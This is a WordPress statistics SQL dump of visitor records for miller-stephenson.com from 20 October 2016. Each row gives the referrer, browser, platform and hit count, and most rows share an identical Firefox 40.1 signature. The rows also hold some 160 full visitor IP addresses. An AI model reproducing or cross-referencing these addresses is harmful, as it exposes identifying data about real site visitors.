INSERT INTO `wp_statistics_visitor` VALUES (7383, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.160.105.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7384, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.228.249.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7385, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.43.112.51', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7386, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.91.234.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7387, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.147.152.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7388, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.24.223.101', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7389, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.64.57.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7390, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.44.173.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7391, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.51.182.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7392, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.98.123.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7393, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7394, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '152.88.94.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7395, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.127.203.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7396, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.120.19.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7397, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.228.24.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7398, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.71.82.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7399, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.162.255.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7400, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.50.8.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7401, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.226.235.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7402, '2016-10-20', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '8.0', '', '62.24.181.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7403, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.168.20.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7404, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.135.13.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7405, '2016-10-20', 'https://www.miller-stephenson.com/product/krytox-ks-1220/', 'MSIE', 'Windows', '11.0', '', '140.180.245.14', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7406, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.107.177.0', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7407, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.65.10.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7408, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.71.6.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7409, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.45.188.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7410, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.155.249.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7411, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.207.112.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7412, '2016-10-20', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '70.196.83.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7413, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.236.0.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7414, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.230.156.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7415, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.64.238.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7416, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.186.105.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7417, '2016-10-20', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7418, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.140.184.77', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7419, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.88.8.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7420, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.140.22.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7421, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.133.134.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7422, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.135.84.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7423, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.219.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7424, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.54.115.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7425, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.92.107.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7426, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.71.106.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7427, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '195.24.219.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7428, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.237.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7429, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.37.188.254', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7430, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.2.81.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7431, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.140.181.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7432, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.157.56.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7433, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.143.255.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7434, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.28.173.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7435, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.158.18.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7436, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.43.242.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7437, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.69.113.159', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7438, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.229.30.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7439, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.238.88.135', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7440, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.171.1.117', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7441, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.168.55.132', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7442, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '64.223.223.3', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7443, '2016-10-20', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1', '', '132.170.21.188', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7444, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.142.22.96', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7445, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '99.239.131.199', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7446, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.47.100.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7447, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '207.119.224.192', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7448, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/', 'MSIE', 'Windows', '11.0', '', '131.59.200.82', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7449, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.71.27.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7450, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.109.33.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7451, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.67.11.198', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7452, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.16.153.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7453, '2016-10-20', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '62.207.131.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7454, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '156.218.145.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7455, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.235.180.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7456, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.46.201.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7457, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.200.218.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7458, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.159.34.87', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7459, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.145.119.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7460, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '130.105.192.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7461, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.48.108.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7462, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.58.65.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7463, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.239.42.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7464, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.62.15.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7465, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.93.91.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7466, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.241.115.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7467, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.139.159.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7468, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.187.56.176', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7469, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.75.113.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7470, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.237.236.157', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7471, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.175.208.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7472, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.150.77.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7473, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.64.177.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7474, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.97.34.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7475, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.137.36.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7476, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.70.108.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7477, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '192.80.95.231', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7478, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.93.187.206', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7479, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.24.132.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7480, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '195.70.107.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7481, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.123.83.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7482, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.248.57.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7483, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.134.22.191', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7484, '2016-10-20', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&sqi=2&ved=0ahUKEwihoZiF0enPAhUG5WMKHbpzBAcQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.cGw', 'MSIE', 'Windows', '10.0', '', '207.228.71.76', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7485, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.86.202.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7486, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.134.187.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7487, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '118.173.94.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7488, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.138.187.187', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7489, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.238.140.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7490, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.2.177.237', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7491, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.196.172.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7492, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.14.137.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7493, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.12.185.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7494, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.146.95.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7495, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.212.103.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7496, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.245.83.14', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7497, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.243.36.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7498, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '208.114.165.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7499, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '208.114.165.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7500, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.123.115.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7501, '2016-10-20', 'https://www.google.ca/', 'Safari', 'Macintosh', '10.0', '', '99.226.99.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7502, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.168.186.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7503, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.116.178.192', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7504, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '159.253.111.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7505, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.98.54.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7506, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.36.222.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7507, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj2xPfR0unPAhWm8YMKHZDwCOYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.amc', 'MSIE', 'Windows', '11.0', '', '205.175.226.102', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7508, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.242.125.171', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7509, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '131.100.160.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7510, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.196', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7511, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.88.233.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7512, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.235.92.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7513, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.50.82.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7514, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.175.231.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7515, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.242.102.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7516, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.178.80.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7517, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.58.39.123', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7518, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.105.112.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7519, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.19.200.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7520, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.156.218.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7521, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.34.40.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7522, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.226.92.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7523, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.91.41.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7524, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.105.177.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7525, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.10.86.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7526, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.116.62.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7527, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.93.159.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7528, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.107.188.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7529, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.125.181.219', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7530, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.39.118.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7531, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.211.56.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7532, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.144.99.45', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7533, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '106.167.175.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7534, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.150.29.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7535, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.131.20.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7536, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '68.193.188.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7537, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.104.5.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7538, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.225.84.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7539, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.12.103.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7540, '2016-10-20', 'https://www.bing.com/search?q=epikure+3200&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7541, '2016-10-20', 'https://www.miller-stephenson.com/product/epikure-3245/', 'MSIE', 'Windows', '9.0', '', '204.79.180.210', '000', 1, 0); 
